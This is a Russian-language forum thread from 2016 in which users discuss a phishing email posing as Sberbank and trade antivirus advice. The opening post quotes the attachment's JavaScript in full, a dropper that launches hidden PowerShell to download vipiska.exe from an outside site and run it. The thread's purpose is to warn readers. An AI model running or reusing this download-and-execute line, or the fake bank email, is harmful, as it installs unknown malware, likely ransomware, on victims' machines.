К списку форумов К списку тем
Регистрация    Правила    Главная форума    Поиск   
Имя: Пароль:
Рекомендовать в новости

В вы давно проверялись на вирусы?

Гость
0 - 10.08.2016 - 17:18
Интересное письмо пришло с адреса osipov.s@sbr.ru:


Уважаемый клиент!
ОАО "Сбербанк" желает Вам приятного дня.

Пожалуйста, внимание на счет в приложении.
По всем вопросам обращайтесь к нашим менеджерам.

С уважением

Павел Осипов.

Менеджер по работе с индивидуальными клиентами

---

приложен файл "выписка426.zip", где находится ява-скрипт следующего содержания:

var lidizzz = new ActiveXObject("shell.application");
lidizzz.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.see21dale.com/wp-content/plugins/libravatar-replace/vipiska.exe','%APPDATA%.exe');Start-Process '%APPDATA%.exe'", "", "open", 0);
var CnQDSbuOWkzeHCF = 582724;


Что-то там скачивает из интернета и потом запускает. Корочи, будьте бдительны.

А вы часто вирусы ловите или всегда предохраняетесь? Какой антивирус стоит?



Гость
1 - 10.08.2016 - 17:20
я сообщения с незнакомых адресов с вложениями вообще не открываю никогда и сразу в спам посылаю.
п.с. стоит лицензионный аваст.
Гость
2 - 10.08.2016 - 17:24
Тут и адрес email выглядит правдоподобно: osipov.s@sbr.ru:

Прям, как будто действительно из Сбербанка шлют.
Гость
3 - 10.08.2016 - 17:25
2-Marr >да хоть от самого медведева. с вложениями - сразу втопку.
4 - 10.08.2016 - 17:26
Аваст
Я не открываю незнакомые ссылки
А сбер все шлет по смс
Гость
5 - 10.08.2016 - 17:28
0-Marr > KIS лицензия стоит. Вирусов не видел давно, даже не знаю просто их нет или благодаря антивирю?
Гость
6 - 10.08.2016 - 17:29
3-gasana > а если фотки шлют или доки? Что значит с вложениями в топку?
Гость
7 - 10.08.2016 - 17:30
Кстати, под этим вложением mail.ru как обычно написало "Вирусов нет. Проверено антивирусом Касперского" :)
Гость
8 - 10.08.2016 - 17:31
6-Стажер >сразу? не предупредив?)
я не про корпоративную почту есличо. а про личный ящик.
Гость
9 - 10.08.2016 - 17:38
8-gasana > ну и про личный ящик. Я открываю все что не опасно.
опасные вложения почтовик и сам блокирует и КИС блокирует и глазами отличаю.

И что значит сразу? Ну вот помнится фоткались на экскурсии, я оставил ящик просил фотки скинуть. Скинули. Ну было штук 12 писем с архивами 7z с jpg внутри, чего не открыть?
Другое дело если ярлык там или url файл или вовсе экзешник - тогда ясное дело запускать не надо :)
10 - 10.08.2016 - 17:44
0-никогда спам не открываю, удаляю.
Гость
11 - 10.08.2016 - 17:46
9-Стажер >по фразе в теме письма можно это определить даже его не открывая :-)
Гость
12 - 10.08.2016 - 17:47
Что-то стоит. Каждый месяц ввожу ключи.
13 - 10.08.2016 - 18:12
0-Marr >два дня назад сдал кровь из вены для проверки на инфекции.
Гость
14 - 10.08.2016 - 18:15
13-SIMATIC >серьёзно ты обеспокоен.
Гость
15 - 10.08.2016 - 18:22
че то как-то подозрительно выглядит сообщение все равно. может позвонить им и спросить, возможно ли получить такое письмо?
16 - 10.08.2016 - 18:44
Цитата:
Сообщение от Marr Посмотреть сообщение
Тут и адрес email выглядит правдоподобно: osipov.s@sbr.ru:
У сбера адреса почты @sberbank.ru
Гость
17 - 10.08.2016 - 18:58
судя по dale.com/wp это либо массад либо ми-7 ))
F11
banned
19 - 10.08.2016 - 19:06
Цитата:
Сообщение от Marr Посмотреть сообщение
Какой антивирус стоит?
давно уже предлагается официальный бесплатный Касперский
есть масса бесплатных антивирусов - AVG и т.д.
Гость
20 - 10.08.2016 - 19:15
19-F11 > от запуска этого скрипта антивирус не спасет. Тем более, что касперский показывает - вируса внутри архива нет.
F11
banned
21 - 10.08.2016 - 19:17
20-Marr > спасибо что предупредил
22 - 10.08.2016 - 20:00
14-ГолаяПравда > да вообще..
23 - 10.08.2016 - 20:28
я презарватив одел на ноут
Гость
24 - 10.08.2016 - 20:37
23- Думаешь поможет?!
25 - 10.08.2016 - 20:48
24-Veronika_S >я не думаю, а знаю. В ай-ти сфере же работаю.
Гость
26 - 11.08.2016 - 10:31
25- Вам их там выдают в неограниченном количестве?)))
27 - 11.08.2016 - 10:40
26-Veronika_S >ага, прячем по карманам, для личного использования.
28 - 11.08.2016 - 11:33
баянище же :))
29 - 11.08.2016 - 11:34
2-Marr > посмотри домен.. sbr.ru - пустое имя.. на продажу..никакого отношения к сберу не имеет... элементарно же :)
30 - 11.08.2016 - 11:47
Пользуюсь AVG, давно уже, нормально.
31 - 11.08.2016 - 13:04
Это не вирус. Никакой антивирус не поможет. Это самый обычный скрипт файл, который уже скачивает непонятно что с левого сайта и запускает с помощью оболочки PowerShell. Что сделает загруженный файл - бог весть. Реальная защита только одна: любое вложение проверять на свойства. Не веря никому. Хоть от самого Темнейшего мыло придет :-). Но доступно не каждому, да. Клевещут, что в DNC именно так и попались.
Гость
32 - 11.08.2016 - 13:08
Нет личной почты на бесплатных серверах. А в корпоративную сомнительным письмам не прорваться.
33 - 11.08.2016 - 13:31
31-Colder >похож на шифровальщик с именем vipiska.exe
Друг на работе пропустил подобное письмо и Каспер не помог. зашифровал он ему весь диск. За ключ попросили 15 т.р.
34 - 11.08.2016 - 13:33
На компе юзаю третий год симантек антивирус. Стоит не особо дорого, около тысячи в год. Вполне меня устраивает, никаких проблем за это время не было.
ЗЫ. Но я и по порносайтам не шляюсь, где шифровальщики обычно, гнездятся.
Гость
35 - 11.08.2016 - 13:40
34-SIMATIC > Антивирус борется с вирусами, а со скриптом, который стартует сам пользователь можно бороться только ограничением пользовательских прав на доступ к файлам, либо созданием виртуальной машины вне локального доступа.
36 - 11.08.2016 - 13:51
35-BoiledEyeInTheRectum > да это понятно, но автор спросил про вирусы, я ответил )

ЗЫ. Для потенциально опасных сайтов типа зайцев.нет и иже с ним использую параллельно установленный на ноуте Линукс.
Гость
37 - 11.08.2016 - 18:59
Купил планшет а в нем оказался вшитый вирус (
Придётся сдать в магазин... Чувствую мороки будет много.(((
В общем интернет растёт развивается и потребители интернета это всего лишь ходячие кошельки... Так что чегото хорошего от интернета ждать глупо...
Гость
38 - 11.08.2016 - 19:08
37-Ginger > а что за планшет такой с вирусом?
Гость
39 - 11.08.2016 - 19:34
38-Marr >TEXET X-pad... Дешевенький конечно, но все равно такая подлянка как вшитый в базовую прогу вирус это уже перебор... Вирус не особо зловредный, просто регулярно вывешивает банеры приглашающие на платные сайты. Раздражает (
Гость
40 - 11.08.2016 - 20:01
39-Ginger > может быть вы как-то подхватили этот вирус и он заразил базовую прогу? Или по отзывам у многих такие проблемы?


К списку вопросов
Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск




Copyright ©, Все права защищены